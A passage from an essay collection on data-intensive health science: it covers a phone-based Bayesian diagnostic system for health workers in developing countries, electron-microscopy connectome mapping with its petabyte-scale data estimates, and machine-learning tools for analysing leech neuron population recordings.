scaling in to provide accurate individual diagnoses, the amount of knowledge required is huge. For example, INTERNIST-1, an expert system for diagnosis in internal medicine, contains approximately 250,000 relationships among roughly 600 diseases and 4,000 findings [3]. Building on the earlier work of one of us (Heckerman), who developed efficient methods for assessing and representing expert medical knowledge via a Bayesian network [4], we have brought together medical literature, textbook information, and expert panel recommendations to construct a growing knowledge base for NxKM, currently including over 1,000 diseases and over 6,000 discrete findings. The system also scales in by allowing very fine-grained data capture. Each finding within an individual health record or diagnostic case can be tracked and monitored. This level of granularity allows for tremendous flexibility in determining factors relating to outcome and diagnostic accuracy. With regard to scaling out across a region, a challenge common to developing countries is the exceptionally diverse and region-specific nature of medical conditions. For example, a disease that is common in one country or region might be rare in another. Whereas rule-based expert systems must be completely reengineered in each region, the modular nature of the NxKM knowledge base, which is based on probabilistic similarity networks [4], allows for rapid customization to each region. The current incarnation of NxKM uses region-specific prevalence from expert estimates. It can also update prevalence in each region as it is used in the field. 
NxKM also incorporates a modular system that facilitates customization to terms, treatments, and language specific to each region. When region-specific information is unknown or unavailable, a default module is used until such data can be collected or identified.

Diagnostic Accuracy and Efficiency

Studies indicate that even highly trained physicians overestimate their diagnostic accuracy. The Institute of Medicine recently estimated that 44,000 to 98,000 preventable deaths occur each year due to medical error, many due to misdiagnosis [5]. In developing countries, the combined challenges of misdiagnoses and missing data not only reduce the quality of medical care for individuals but lead to missed outbreak recognition and flawed population health assessment and planning. Again, building on the diagnostic methodology from probabilistic similarity networks [4], NxKM employs a Bayesian reasoning engine that yields accurate diagnoses. An important component of the system that leads to improved accuracy is the ability to ask the user additional questions that are likely to narrow the range of possible diagnoses. NxKM has the ability to ask the user for additional findings based on value-of-information computations (such as a cost function) [4]. Also important for clinical use is the ability to identify the confidence in the diagnosis (i.e., the probability of the most likely diagnosis). This determination is especially useful for less-expert users of the system, which is important for improving and supervising the care delivered by health extension workers (HEWs) in developing regions where deep medical knowledge is rare.

Getting Healthcare to Where It Is Needed: The Last Mile

Another key challenge is getting diagnostics to where they are most needed. Because of their prevalence in developing countries, cell phones are a natural choice for a delivery vehicle. Indeed, it is believed that, in many such areas, access to cell phones is better than access to clean water. For example, according to the market database Wireless Intelligence, 80 percent of the world's population was within range of a cellular network in 2008. And figures from the International Telecommunication Union show that by the end of 2006, 68 percent of the world's mobile subscriptions were in developing countries. More recent data from the International Telecommunication Union shows that between 2002 and 2007, cellular subscription was the most rapid growth area for telecommunication in the world, and that the per capita increase was greatest in the developing world. Consequently, we have developed a system wherein cell phones are used to access a centrally placed NxKM knowledge base and diagnostic engine implemented on a PC. We are now testing the use of this system with HEWs in rural India. In addition to providing recommendations for medical care to the HEWs, the phone/central-PC solution can be used to create portable personal health records. One of our partner organizations, School Health Annual Report Programme (SHARP), will use it to screen more than 10 million Indian schoolchildren in 2009, creating a unique virtual personal health record for each child. Another advantage of this approach is that the data collected by this system can be used to improve the NxKM knowledge base. For example, as mentioned above, information about region-specific disease prevalence is important for accurate medical diagnosis.
Especially important is time-critical information about the outbreak of a disease in a particular location. As the clinical application is used, validated disease cases, including those corresponding to a new outbreak, are immediately available to NxKM. In addition, individual diagnoses can be monitored centrally. If the uploaded findings of an individual patient are found to yield a low-confidence diagnosis, the patient can be identified for follow-up.

The User Interface

A challenge with cellular technology is the highly constrained user interface and the difficulty of entering data using a relatively small screen and keypad. Our system simplifies the process in a number of ways. First, findings that are common for a single location (e.g., facts about a given village) are prepopulated into the system. Also, as mentioned above, the system is capable of generating questions (specifically, simple multiple-choice questions) after only basic information, such as the chief complaint, has been entered. In addition, questions can be tailored to the organization, location, or skill level of the HEW user. It is also important that the user interface be independent of the specific device hardware because users often switch between phones of different designs. Our interface application sits on top of a middle-layer platform that we have implemented for multiple devices. In addition to simple input, the interface allows easy access to important bits of information. For example, it provides a daily summary of patients needing care, including their diagnosis, village location, and previous caregivers.

Data-Sharing Solutions

Even beyond traditional legacy data silos (such as EPIC and CERNER) [5], barriers to sharing critical public health data still exist, including concerns about privacy and sovereignty. Data availability can also be limited regionally (e.g., in India and South Africa), by organizations (e.g., the World Health Organization, World Vision, or pharmaceutical companies), or by providers (e.g., insurance companies and medical provider groups). Significant public health value resides in each of these datasets, and efforts should be made to overcome the barriers to gathering data into shared, de-identified global databases. Such public datasets, while useful on their own, also add significant value to proprietary datasets, providing valuable generic context to proprietary information.

NxOpinion's innovative approach: showing data when you want it, how you want it, and where you want it, using artificial intelligence.

NxKM imports, manages, and exports data via publish sets. These processes allow various interest groups (governments, public health organizations, primary care providers, small hospitals, laboratory and specialty services, and insurance providers) to share the same interactive, de-identified (privacy-preserving) global database while maintaining control of proprietary and protected data.

Looking Forward

Several challenges remain. While better-educated HEWs are able to use these data collection and diagnostic decision support tools readily, other HEWs, such as Accredited Social Health Activists (ASHAs) and other front-line village workers, are often illiterate or speak only a local dialect. We are exploring two potential solutions: one that uses voice recognition technology and another that allows a user to answer multiple-choice questions via the cell phone's numeric keypad.
Voice recognition technology provides added flexibility in input, but, at least so far, it requires the voice recognizer to be trained by each user. Another challenge is unique and reproducible patient identification (verification that the subject receiving treatment is actually the correct patient) when there is no standard identification system for most under-served populations. Voice recognition combined with face recognition and newer methods of biometrics, along with a corroborating GPS location, can help ensure that the patient who needs the care is the one actually receiving treatment.

Another barrier is data integrity. For example, most rural individuals will report diagnoses that have not been substantiated by qualified medical personnel and could be erroneous. We have attempted to mitigate this issue by using an inference engine that allows for down-weighting of unsubstantiated evidence. Deploying systems that work anywhere in the world can lead to the creation of a massive amount of patient information. Storing, reconciling, and then accessing that information in the field, all while maintaining appropriate privacy and security, are exceptionally challenging when patient numbers are in the millions (instead of tens of thousands, as with most current electronic health record systems). Further, feeding verified data on this scale back into the system to improve its predictive capability, while maintaining the ability to analyze and retrieve specific segments (data mining), remains difficult.

A final, and perhaps the greatest, obstacle is that of cooperation. If organizations, governments, and companies are willing to share a de-identified global database while protecting and owning their own databases, medical science and healthcare can benefit tremendously. A unified database that allows integration across many monitoring and evaluation systems and databases should help in quickly and efficiently identifying drug resistance or outbreaks of disease and in monitoring the effectiveness of treatments and healthcare interventions. The global database should support data queries that guard against the identification of individuals and yet provide sufficient information for statistical analyses and validation. Such technology is beginning to emerge (e.g., [6]), but the daunting challenge of finding a system of rewards that encourages such cooperation remains.

Summary

We have developed and are beginning to deploy a system for the acquisition, analysis, and transmission of medical knowledge and data in developing countries. The system includes a centralized component based on PC technology that houses medical knowledge and data and has real-time diagnostic capabilities, complemented by a cell phone-based interface for medical workers in the field. We believe that such a system will lead to improved medical care in developing countries through improved diagnoses, the collection of more accurate and timely data across more individuals, and the improved dissemination of accurate and timely medical knowledge and information. When we stop and think about how a world of connected personal health records can be used to improve medicine, we can see that the potential impact is staggering. By knowing virtually every individual who exists, the diseases affecting that person, and where he or she is located; by improving data integrity; and by collecting the data in a central location, we can revolutionize medicine and perhaps even eradicate more diseases.
This global system can monitor the effects of various humanitarian efforts and thereby justify and tailor efforts, medications, and resources to specific areas. It is our hope that a system that can offer high-quality diagnoses as well as collect and rapidly disseminate valid data will save millions of lives. Alerts and responses can become virtually instantaneous and can thus lead to the identification of drug resistance, outbreaks, and effective treatments in a fraction of the time it takes now. The potential for empowering caregivers in developing countries through a global diagnostic and database system is enormous.

References

[1] S. S. Lim, D. B. Stein, A. Charrow, and C. J. L. Murray, "Tracking progress towards universal childhood immunisation and the impact of global initiatives: a systematic analysis of three-dose diphtheria, tetanus, and pertussis immunisation coverage," Lancet, vol. 372, pp. 2031-2046, 2008, doi: 10.1016/S0140-6736(08)61869-3.
[2] The Millennium Development Goals Report. United Nations, 2008.
[3] R. A. Miller, M. A. McNeil, S. M. Challinor, F. E. Masarie, Jr., and J. D. Myers, "The Internist-1/Quick Medical Reference Project - Status Report," West. J. Med., vol. 145, pp. 816-822, 1986.
[4] D. Heckerman, Probabilistic Similarity Networks. Cambridge, MA: MIT Press, 1991.
[5] L. Kohn, J. Corrigan, and M. Donaldson, Eds., To Err Is Human: Building a Safer Health System. Washington, D.C.: National Academies Press, 2000.
[6] C. Dwork and K. Nissim, "Privacy-Preserving Datamining on Vertically Partitioned Databases," Proc. CRYPTO, 2004, doi: 10.1.1.86.8559.

HEALTH AND WELLBEING

Jeff W. Lichtman, R. Clay Reid, and Hanspeter Pfister, Harvard University
Michael F. Cohen, Microsoft Research

The human brain is the most complex puzzle in all of biology. Every second in the human brain, billions of cortical nerve cells transmit billions of messages and perform extraordinarily complex computations. How the brain works (how its function follows from its structure) remains a mystery. The brain's vast numbers of nerve cells are interconnected at synapses in circuits of unimaginable complexity. It is largely assumed that the specificity of these interconnections underlies our ability to perceive and classify objects; our behaviors, both learned (such as playing the piano) and intrinsic (such as walking); and our memories, not to mention the control of lower-level functions such as maintaining posture and even breathing. At the highest level, our emotions, our sense of self, our very consciousness are entirely the result of activities in the nervous system.

At a macro level, human brains have been mapped into regions that can be roughly associated with specific types of activities. However, even this building-block approach is fraught with complexity because often many parts of the brain participate in completing a task. This complexity arises especially because most behaviors begin with sensory input and are followed by analysis, decision making, and finally a motor output or action. At the microscopic level, the brain comprises billions of neurons, each connected to other neurons by up to several thousand synaptic connections. Although the existence of these synaptic circuits has been appreciated for over a century, we have no detailed circuit diagrams of the brains of humans or any other mammals. Indeed, neural circuit mapping has been attempted only once, and that was two decades ago on a small worm with only 300 nerve cells.
The central stumbling block is the enormous technical difficulty associated with such mapping. Recent technological breakthroughs in imaging, computer science, and molecular biology, however, allow a reconsideration of this problem. But even if we had a wiring diagram, we would need to know what messages the neurons in the circuit are passingnot unlike listening to the signals on a computer chip. This represents the second impediment to understanding: traditional physiological methods let us listen to only a tiny fraction of the nerves in the circuit. To get a sense of the scale of the problem, consider the cerebral cortex of the human brain, which contains more than 160 trillion synaptic connections. These connections originate from billions of neurons. Each neuron receives synaptic connections from hundreds or even thousands of different neurons, and each sends information via synapses to a similar number of target neurons. This enormous fan-in and fan-out can occur because each neuron is geometrically complicated, possessing many receptive processes (dendrites) and one highly branched outflow process (an axon) that can extend over relatively long distances. One might hope to be able to reverse engineer the circuits in the brain. In other words, if we could only tease apart the individual neurons and see which one is connected to which and with what strength, we might at least begin to have the tools to decode the functioning of a particular circuit. The staggering numbers and complex cellular shapes are not the only daunting aspects of the problem. The circuits that connect nerve cells are nanoscopic in scale. The density of synapses in the cerebral cortex is approximately 300 million per cubic millimeter. Functional magnetic resonance imaging (fMRI) has provided glimpses into the macroscopic 3-D workings of the brain. However, the finest resolution of fMRI is approximately 1 cubic millimeter per voxelthe same cubic millimeter that can contain 300 million synapses. Thus there is a huge amount of circuitry in even the most finely resolved functional images of the human brain. Moreover, the size of these synapses falls below the diffraction-limited resolution of traditional optical imaging technologies. Circuit mapping could potentially be amenable to analysis based on color coding of neuronal processes [1] and/or the use of techniques that break through the 76 diffraction limit [2]. Presently, the gold standard for analyzing synaptic connections is to use electron microscopy (EM), whose nanometer (nm) resolution is more than sufficient to ascertain the finest details of neural connections. But to map circuits, one must overcome a technical hurdle: EM typically images very thin sections (tens of nanometers in thickness), so reconstructing a volume requires a serial reconstruction whereby the image information from contiguous slices of the same volume is recomposed into a volumetric dataset. There are several ways to generate such volumetric data (see, for example, [3-5]), but all of these have the potential to generate astonishingly large digital image data libraries, as described next. Some Numbers If one were to reconstruct by EM all the synaptic circuitry in 1 cubic mm of brain (roughly what might fit on the head of a pin), one would need a set of serial images spanning a millimeter in depth. Unambiguously resolving all the axonal and dendritic branches would require sectioning at probably no more than 30 nm. Thus the 1 mm depth would require 33,000 images. 
Each image should have at least 10 nm lateral resolution to discern all the vesicles (the source of the neurotransmitters) and synapse types. A square-millimeter image at 5 nm resolution has ~4 × 10^10 pixels, or tens of gigapixels. So the image data in 1 cubic mm will be in the range of 1 petabyte (2^50, or roughly 10^15, bytes). The human brain contains nearly 1 million cubic mm of neural tissue.

Some Successes to Date

Given this daunting task, one is tempted to give up and find a simpler problem. However, new technologies and techniques provide glimmers of hope. We are pursuing these with the ultimate goal of creating a connectome: a complete circuit diagram of the brain. This goal will require intensive and large-scale collaborations among biologists, engineers, and computer scientists. Three years ago, the Reid and Lichtman labs began working on ways to automate and accelerate large-scale serial-section EM. Focusing specifically on large cortical volumes at high resolution, the Reid group has concentrated on very high throughput as well as highly automated processes. So far, their work has been published only in abstract form [3], but they are confident about soon having the first 10 terabytes of volumetric data on fine-scale brain anatomy. Physiological experiments can now show the function of virtually every neuron in a 300 μm cube. The new EM data has the resolution to show virtually every axon, dendrite, and synapse: the physical connections that underlie neuronal function.

The problem of separating and tracking the individual neurons within the volume remains. However, some successes have already been achieved using exotic means. Lichtman's lab found a way to express various combinations of red, green, and blue fluorescent proteins in genetically engineered mice. These random combinations presently provide about 90 colors or combinations of colors [1]. With this approach, it is possible to track individual neurons as they branch to their eventual synaptic connections to other neurons or to the end-organs in muscle. The multicolor labeled nerves (dubbed "brainbow"), shown in Figure 1, are reminiscent of the rainbow cables in computers and serve the same purpose: to disambiguate wires traveling over long distances. Because these colored labels are present in the living mouse, it is possible to track synaptic wiring changes by observing the same sites multiple times over minutes, days, or even months.

Reid's lab has been able to stain neurons of rat and cat visual cortices such that they light up when activated. By stimulating the cat with lines of different orientations, they have literally been able to see which neurons are firing, depending on the specific visual stimulus. By comparing the organization of the rat's visual cortex to that of the cat, they have found that while a rat's neurons appear to be randomly organized based on the orientation of the visual stimulus, a cat's neurons exhibit remarkable structure. (See Figure 2.)
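For readers who want to check the "Some Numbers" estimates above, the arithmetic can be written out directly. The one-byte-per-pixel assumption below is ours, and the figures are order-of-magnitude only.

```python
# Rough data-volume arithmetic for serial-section EM of 1 cubic mm of cortex.
SECTION_THICKNESS_NM = 30        # sectioning at ~30 nm
PIXEL_SIZE_NM = 5                # ~5 nm lateral resolution
BYTES_PER_PIXEL = 1              # assumption: 8-bit grayscale

mm_in_nm = 1_000_000             # 1 mm expressed in nanometers

num_sections = mm_in_nm // SECTION_THICKNESS_NM        # ~33,000 section images
pixels_per_image = (mm_in_nm // PIXEL_SIZE_NM) ** 2    # ~4 x 10^10 pixels per image
bytes_per_cubic_mm = num_sections * pixels_per_image * BYTES_PER_PIXEL

print(f"{num_sections:,} sections, {pixels_per_image:.1e} pixels per section image")
print(f"~{bytes_per_cubic_mm / 1e15:.1f} petabytes per cubic mm")
print(f"~{bytes_per_cubic_mm * 1e6:.1e} bytes for ~10^6 cubic mm of brain")
```

Multiplying the per-cubic-millimeter figure by the roughly one million cubic millimeters in a human brain shows why whole-brain connectomics is an extreme data problem.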
Figure 1. Brainbow images showing individual neurons fluorescing in different colors. By tracking the neurons through stacks of slices, we can follow each neuron's complex branching structure to create the treelike structures in the image on the right.

Figure 2. Neurons in a visual cortex stained in vivo with a calcium-sensitive dye. Left: A 3-D reconstruction of thousands of neurons in a rat visual cortex, obtained from a stack of images (300 μm on a side). The neurons are color coded according to the orientation of the visual stimulus that most excited them. Center: A 2-D image of the plane of section from the left panel. Neurons that responded to different stimulus orientations (different colors) are arranged seemingly randomly in the cortex. Inset: Color coding of stimulus orientations. Right: By comparison, the cat visual cortex is extremely ordered. Neurons that responded preferentially to different stimulus orientations are segregated with extraordinary precision. This image represents a complete 3-D functional map of over 1,000 neurons in a 300 × 300 × 200 μm volume in the visual cortex [6, 7].

Achieving the finest resolution using EM requires imaging very thin slices of neural tissue. One method begins with a block of tissue; after each imaging pass, a thin slice is removed (and destroyed) from the block, and then the process is repeated. Researchers in the Lichtman group at Harvard have developed a new device, a sort of high-tech lathe that they are calling an Automatic Tape-Collecting Lathe Ultramicrotome (ATLUM), that can allow efficient nanoscale imaging over large tissue volumes. (See Figure 3 on the next page.) With the ATLUM [3], tissue blocks large enough to span entire multi-region neuronal circuits can be quickly and reliably reduced to a tape of ultrathin sections. SEM images of these ATLUM-collected sections can attain lateral resolutions of 5 nm or better, sufficient to image individual synaptic vesicles and to identify and trace all circuit connectivity.

The thin sections are imaged one small region at a time. Once a series of individual images is obtained, these images must be stitched together into very large images and possibly stacked into volumes.

Figure 3. The Automatic Tape-Collecting Lathe Ultramicrotome (ATLUM), which can allow efficient nanoscale imaging over large tissue volumes. The tissue rotates while the knife advances; these synchronized motions produce a spiral cut through the tissue block, yielding a continuous ribbon of tissue in the knife's water boat. The knife's water level is adjusted via an inlet tube.

At Microsoft Research, work has proceeded to stitch together and then interactively view images containing billions of pixels. Once these gigapixel-size images are organized into a hierarchical pyramid, the HD View application can stream requested imagery over the Web for viewing. This allows exploration of both large-scale and very fine-scale features. Figure 4 shows a walkthrough of the result. Once the images are captured and stitched, multiple slices of a sample must be stacked to assemble them into a coherent volume. Perhaps the most difficult task at that point is extracting the individual strands of neurons. Work is under way at Harvard to provide interactive tools to aid in outlining individual processes and then tracking them slice to slice to pull out each dendritic and axonal fiber [8, 9]. (See Figure 5.) Synaptic interfaces are perhaps even harder to find automatically; however, advances in both user interfaces and computer vision give hope that the whole process can be made tractable.

Decoding the complete connectome of the human brain is one of the great challenges of the 21st century. Advances at both the biological and the technical level are certain to lead to new successes and discoveries, and they will hopefully help answer fundamental questions about how our brain performs the miracle of thought.
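The hierarchical pyramid mentioned above is easy to quantify. The short calculation below estimates, for a hypothetical gigapixel-scale stitched mosaic, how many zoom levels and 256 × 256 tiles a power-of-two pyramid contains; the image dimensions and tile size are illustrative assumptions, not details of the actual HD View implementation.

```python
import math

def pyramid_stats(width_px, height_px, tile=256):
    """Tile counts per level for a power-of-two image pyramid (deep-zoom style),
    from full resolution down to a 1x1 thumbnail."""
    w, h = width_px, height_px
    levels = []
    while True:
        levels.append((w, h, math.ceil(w / tile) * math.ceil(h / tile)))
        if w == 1 and h == 1:
            break
        w, h = max(1, (w + 1) // 2), max(1, (h + 1) // 2)
    return levels

# A hypothetical 2.5-gigapixel stitched EM mosaic, e.g., 50,000 x 50,000 pixels.
levels = pyramid_stats(50_000, 50_000)
print(len(levels), "zoom levels,", sum(t for _, _, t in levels), "tiles in total")
print(levels[0])   # finest level: tens of thousands of tiles, but a viewer only
                   # streams the handful of tiles covering the current viewport
```

The point of the pyramid is exactly this last comment: at any zoom level, only the few tiles visible on screen need to travel over the network.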
Figure 4. HD View allows interactive exploration of this 2.5-gigapixel image. Left: A slice of neural tissue. The large gray feature in the center is the nucleus of a neuron. Center: A close-up of a capillary and a myelinated axon. Right: A close-up of myelin layers encircling the cross-section of an axon. Bottom: A zoomed-in view showing tiny vesicles surrounding a synaptic connection between very fine structures.

Figure 5. NeuroTrace allows neuroscientists to interactively explore and segment neural processes in high-resolution EM data.

References

[1] J. Livet, T. A. Weissman, H. Kang, R. W. Draft, J. Lu, R. A. Bennis, J. R. Sanes, and J. W. Lichtman, "Transgenic strategies for combinatorial expression of fluorescent proteins in the nervous system," Nature, vol. 450, pp. 56-62, 2007, doi: 10.1038/nature06293.
[2] S. Hell, "Microscopy and its focal switch," Nature Methods, vol. 6, pp. 24-32, 2009, doi: 10.1038/NMeth.1291.
[3] D. Bock, W. C. Lee, A. Kerlin, M. L. Andermann, E. Soucy, S. Yurgenson, and R. C. Reid, "High-throughput serial section electron microscopy in mouse primary visual cortex following in vivo two-photon calcium imaging," Soc. Neurosci. Abstr., vol. 769, no. 12, 2008.
[4] W. Denk and H. Horstmann, "Serial block-face scanning electron microscopy to reconstruct three-dimensional tissue nanostructure," PLoS Biol., vol. 2, p. e329, 2004, doi: 10.1017/S1431927606066268.
[5] K. J. Hayworth, N. Kasthuri, R. Schalek, and J. W. Lichtman, "Automating the Collection of Ultrathin Serial Sections for Large Volume TEM Reconstructions," Microsc. Microanal., vol. 12, pp. 86-87, 2006.
[6] K. Ohki, S. Chung, Y. H. Ch'ng, P. Kara, and R. C. Reid, "Functional imaging with cellular resolution reveals precise microarchitecture in visual cortex," Nature, vol. 433, pp. 597-603, 2005, doi: 10.1038/nature03274.
[7] K. Ohki, S. Chung, P. Kara, M. Hübener, T. Bonhoeffer, and R. C. Reid, "Highly ordered arrangement of single neurons in orientation pinwheels," Nature, vol. 442, pp. 925-928, 2006, doi: 10.1038/nature05019.
[8] W. Jeong, J. Beyer, M. Hadwiger, A. Vazquez, H. Pfister, and R. Whitaker, "Scalable and Interactive Segmentation and Visualization of Neural Processes in EM Datasets," IEEE Trans. Visual. Comput. Graphics, Oct. 2009.
[9] A. Vazquez, E. Miller, and H. Pfister, "Multiphase Geometric Couplings for the Segmentation of Neural Processes," Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition (CVPR), June 2009.

HEALTH AND WELLBEING

Although great strides have been made in neurobiology, we do not yet understand how the symphony of communication among neurons leads to rich, competent behaviors in animals. How do local interactions among neurons coalesce into the behavioral dynamics of nervous systems, giving animals their impressive abilities to sense, learn, decide, and act in the world? Many details remain cloaked in mystery. We are excited about the promise of gaining new insights by applying computational methods, in particular machine learning and inference procedures, to generate explanatory models from data about the activities of populations of neurons.

For most of the history of electrophysiology, neurobiologists have monitored the membrane properties of neurons of vertebrates and invertebrates by using glass micropipettes filled with a conducting solution.
Mastering techniques that would impress the most expert of watchmakers, neuroscientists have fabricated glass electrodes with tips that are often less than a micron in diameter, and they have employed special machinery to punch the tips into the cell bodies of single neuronswith the hope that the neurons will function as they normally do within larger assemblies. Such an approach has provided data about the membrane voltages and action 83 potentials of a single cell or just a handful of cells. However, the relationship between neurobiologists and data about nervous systems is changing. New recording machinery is making data available on the activity of large populations of neurons. Such data makes computational procedures increasingly critical as experimental tools for unlocking new understanding about the connections, architecture, and overall machinery of nervous systems. New opportunities for experimentation and modeling on a wider scale have become available with the advent of fast optical imaging methods. With this approach, dyes and photomultipliers are used to track calcium levels and membrane potentials of neurons, with high spatial and temporal resolution. These high-fidelity optical recordings allow neurobiologists to examine the simultaneous activity of populations of tens to thousands of neurons. In a relatively short time, data available about the activity of neurons has grown from a trickle of information gleaned via sampling of small numbers of neurons to large-scale observations of neuronal activity. Spatiotemporal datasets on the behaviors of populations of neurons pose tantalizing inferential challenges and opportunities. The next wave of insights about the neurophysiological basis for cognition will likely come via the application of new kinds of computational lenses that direct an information-theoretic optics onto streams of spatiotemporal population data. We foresee that neurobiologists studying populations of neurons will one day rely on tools that serve as computational microscopessystems that harness machine learning, reasoning, and visualization to help neuroscientists formulate and test hypotheses from data. Inferences derived from the spatiotemporal data streaming from a preparation might even be overlaid on top of traditional optical views during experiments, augmenting those views with annotations that can help with the direction of the investigation. Intensive computational analyses will serve as the basis for modeling and visualization of the intrinsically high-dimensional population data, where multiple neuronal units interact and contribute to the activity of other neurons and assemblies, and where interactions are potentially context sensitivecircuits and flows might exist dynamically, transiently, and even simultaneously on the same neuronal substrate. Computation and Complexity We see numerous opportunities ahead for harnessing fast-paced computations to assist neurobiologists with the science of making inferences from neuron popula- 84 tion data. Statistical analyses have already been harnessed in studies of populations of neurons. For example, statistical methods have been used to identify and characterize neuronal activity as trajectories in large dynamical state spaces [1]. We are excited about employing richer machine learning and reasoning to induce explanatory models from case libraries of neuron population data. 
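The sketch below is not the authors' inference machinery; it is a deliberately minimal illustration of the simplest kind of structure one might induce from population recordings, thresholded pairwise correlations between activity traces, of the sort such interactive tools might expose. The synthetic traces, group structure, and threshold are all invented.

```python
import numpy as np

rng = np.random.default_rng(0)

# Hypothetical population recording: activity traces for 6 neurons over 500 time steps.
# Neurons 0-2 are driven by one shared signal, neurons 3-5 by another.
t = 500
drive_a, drive_b = rng.standard_normal(t), rng.standard_normal(t)
traces = np.vstack([drive_a + 0.5 * rng.standard_normal(t) for _ in range(3)] +
                   [drive_b + 0.5 * rng.standard_normal(t) for _ in range(3)])

# Pairwise correlation of activity over time.
corr = np.corrcoef(traces)

def inferred_edges(corr_matrix, threshold):
    """Admit an (i, j) edge when |correlation| exceeds the threshold,
    mimicking a slider that loosens or tightens the criterion."""
    n = corr_matrix.shape[0]
    return [(i, j, round(float(corr_matrix[i, j]), 2))
            for i in range(n) for j in range(i + 1, n)
            if abs(corr_matrix[i, j]) >= threshold]

print(inferred_edges(corr, threshold=0.5))   # recovers the two groups of co-active neurons
```

Richer analyses of the kind discussed next replace raw correlation with learned probabilistic dependencies, but the interactive thresholding idea is the same.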
Computational procedures for induction can assist scientists with teasing insights from raw data on neuronal activity by searching over large sets of alternatives and weighing the plausibility of different explanatory models. The computational methods can be tasked with working at multiple levels of detail, extending upward from circuitcentric exploration of local connectivity and functionality of neurons to potentially valuable higher-level abstractions of neuronal populationsabstractions that may provide us with simplifying representations of the workings of nervous systems. Beyond generating explanations from observations, inferential models can be harnessed to compute the expected value of information, helping neuroscientists to identify the best next test to perform or information to gather, in light of current goals and uncertainties. Computing the value of information can help to direct interventional studies, such as guidance on stimulating specific units, clamping the voltage of particular cells, or performing selective modification of cellular activity via agonist and antagonist pharmacological agents. We believe that there is promise in both automated and interactive systems, including systems that are used in real-time settings as bench tools. Computational tools might one day even provide real-time guidance for probes and interventions via visualizations and recommendations that are dynamically generated during imaging studies. Moving beyond the study of specific animal systems, computational tools for analyzing neuron population data will likely be valuable in studies of the construction of nervous systems during embryogenesis, as well as in comparing nervous systems of different species of animals. Such studies can reveal the changes in circuitry and function during development and via the pressures of evolutionary adaptation. Spectrum of Sophistication Neurobiologists study nervous systems of invertebrates and vertebrates across a spectrum of complexity. Human brains are composed of about 100 billion neurons that interact with one another via an estimated 100 trillion synapses. In contrast, the brain of the nematode, Caenorhabditis elegans (C. elegans), has just 302 neurons. Such invertebrate nervous systems offer us an opportunity to learn about the prin- 85 ciples of neuronal systems, which can be generalized to more complex systems, including our own. For example, C. elegans has been a model system for research on the structure of neuronal circuits; great progress has been achieved in mapping the precise connections among its neurons. Many neurobiologists choose to study simpler nervous systems even if they are motivated by questions about the neurobiological nature of human intelligence. Nervous systems are derived from a family tree of refinements and modifications, so it is likely that key aspects of neuronal information processing have been conserved across brains of a range of complexities. While new abstractions, layers, and interactions may have evolved in more complex nervous systems, brains of different complexities likely rely on a similar neuronal fabricand there is much that we do not know about that fabric. In work with our colleagues Ashish Kapoor, Erick Chastain, Johnson Apacible, Daniel Wagenaar, and Paxon Frady, we have been pursuing the use of machine learning, reasoning, and visualization to understand the machinery underlying decision making in Hirudo, the European medicinal leech. 
We have been applying computational analyses to make inferences from optical data about the activity of populations of neurons within the segmental ganglia of Hirudo. The ganglia are composed of about 400 neurons, and optical imaging reveals the activity of approximately 200 neurons at a timeall the neurons on one side of the ganglion. Several frames of the optical imaging of Hirudo are displayed in Figure 1. The brightness Figure 1. 86 of each of the imaged neurons represents the level of depolarization of the cells, which underlies the production of action potentials. We are developing analyses and assembling tools in pursuit of our vision of developing computational microscopes for understanding the activity of neuronal populations and their relationship to behavior. In one approach, we generate graphical probabilistic temporal models that can predict the forthcoming behavior of Hirudo from a short window of analysis of population data. The models are generated by searching over large spaces of feasible models in which neurons, and abstractions of neurons, serve as random variables and in which temporal and atemporal dependencies are inferred among the variables. The methods can reveal modules of neurons that appear to operate together and that can appear dynamically over the course of activity leading up to decisions by the animal. In complementary work, we are considering the role of neuronal states in defining trajectories through state spaces of a dynamical system. Emergence of a Computational Microscope We have started to build interactive viewers and tools that allow scientists to manipulate inferential assumptions and parameters and to inspect implications visually. For example, sliders allow for smooth changes in thresholds for admitting connections among neurons and for probing strengths of relationships and membership in modules. We would love to see a world in which such tools are shared broadly among neuroscientists and are extended with learning, inference, and visualization components developed by the neuroscience community. Figure 2 on the next page shows a screenshot of a prototype tool we call the MSR Computational Microscope, which was developed by Ashish Kapoor, Erick Chastain, and Eric Horvitz at Microsoft Research as part of a broader collaboration with William Kristan at the University of California, San Diego, and Daniel Wagenaar at California Institute of Technology. The tool allows users to visualize neuronal activity over a period of time and then explore inferences about relationships among neurons in an interactive manner. Users can select from a variety of inferential methods and specify modeling assumptions. They can also mark particular neurons and neuronal subsets as focal points of analyses. The view in Figure 2 shows an analysis of the activity of neurons in the segmental ganglia of Hirudo. Inferred informational relationships among cells are displayed via highlighting of neurons and through the generation of arcs among neurons. Such inferences can help to guide exploration and confirmation of physical connections among neurons. 87 Figure 2. Possible connections and clusters inferred from population data during imaging of Hirudo. Figure 3. Inferred informational relationships among neurons in a segmental ganglion of Hirudo. Measures of similarity of the dynamics of neuronal activity over time are displayed via arcs and clusters. 
Figure 3 shows another informational analysis that spatially clusters cells that behave in a similar manner in the ganglia of Hirudo over a set of trials. The analysis provides an early vision of how information-theoretic analyses might one day help neurobiologists to discover and probe interactions within and between neuronal subsystems. We are only at the start of this promising research direction, but we expect to see a blossoming of analyses, tools, and a broader sub-discipline that focuses on the neuroinformatics of populations of neurons. We believe that computational methods will lead us to effective representations and languages for understanding neuronal systems and that they will become essential tools for neurobiologists to gain insight into the myriad mysteries of sensing, learning, and decision making by nervous systems.

References

[1] K. L. Briggman, H. D. I. Abarbanel, and W. B. Kristan, Jr., "Optical imaging of neuronal populations during decision-making," Science, vol. 307, pp. 896-901, 2005, doi: 10.1126/science.110.

HEALTH AND WELLBEING

The quantity of available healthcare data is rising rapidly, far exceeding the capacity to deliver personal or public health benefits from analyzing this data [1]. Three key elements of the rise are electronic health records (EHRs), biotechnologies, and scientific outputs. We discuss these in turn below, leading to our proposal for a unified modeling approach that can take full advantage of a data-intensive environment.

